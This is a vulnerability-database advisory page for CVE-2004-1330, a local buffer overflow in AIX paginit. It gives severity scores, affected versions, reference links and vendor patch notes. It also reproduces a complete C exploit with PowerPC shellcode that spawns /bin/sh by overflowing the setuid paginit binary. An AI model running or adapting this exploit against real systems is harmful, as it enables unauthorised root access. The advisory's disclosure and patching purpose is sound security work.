CVE-2004-1330
CVSS 7.2
Published: 2004-12-31 00:00:00
Last revised: 2016-10-17 22:53:18
NMCOE    

[Original] Buffer overflow in paginit in AIX 5.1 through 5.3 allows local users to execute arbitrary code via a long username.


[CNNVD] IBM AIX PAGINIT Local Buffer Overflow Vulnerability (CNNVD-200412-316)

A buffer overflow vulnerability exists in paginit in AIX 5.1 through 5.3. Local users can execute arbitrary code by supplying an overly long username.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation requires no special access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:5.2    IBM AIX 5.2
cpe:/o:ibm:aix:5.3    IBM AIX 5.3
cpe:/o:ibm:aix:5.2_l  IBM AIX 5.2 L
cpe:/o:ibm:aix:5.3_l  IBM AIX 5.3 L
cpe:/o:ibm:aix:5.2.2  IBM AIX 5.2.2

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1330
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1330
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-316
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110355931920123&w=2
(UNKNOWN)  BUGTRAQ  20041220 AIX 5.1/5.2/5.3 local root exploits
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64312&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64312
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64358&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64358
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64522&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64522
http://www.frsirt.com/exploits/20041220.paginit.c.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20041220.paginit.c.php
http://www.securityfocus.com/bid/12043
(PATCH)  BID  12043
http://xforce.iss.net/xforce/xfdb/18618
(UNKNOWN)  XF  aix-paginit-username-bo(18618)

- Vulnerability information

IBM AIX PAGINIT Local Buffer Overflow Vulnerability
High severity; buffer overflow
2004-12-31 00:00:00 2005-10-20 00:00:00
Local
A buffer overflow vulnerability exists in paginit in AIX 5.1 through 5.3. Local users can execute arbitrary code by supplying an overly long username.

- Advisories and patches

IBM has released fixes and an advisory to address this issue for the following releases:
IBM AIX 5.2
IBM AIX 5.3
IBM AIX 5.2 L
IBM AIX 5.2.2
IBM AIX 5.3 L

- Vulnerability information (699)

AIX 5.1 to 5.3 paginit Local Stack Overflow Exploit (EDBID:699)
aix local
2004-12-20 Verified
0 cees-bart
N/A
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb cs ru nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"      
"\x7c\xa8\x02\xa6"      
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"      
"\x7c\xc7\x48\x10"      
"\x38\x46\xc9\x05"      
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"      
"\x38\x87\xee\xef"      
"\x7c\xc9\x03\xa6"      
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"      
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone 
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) 
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);  
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0; 
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}

// milw0rm.com [2004-12-20]
		

- Vulnerability information

12528
IBM AIX paginit Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-12-20 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on the relevant MITRE websites.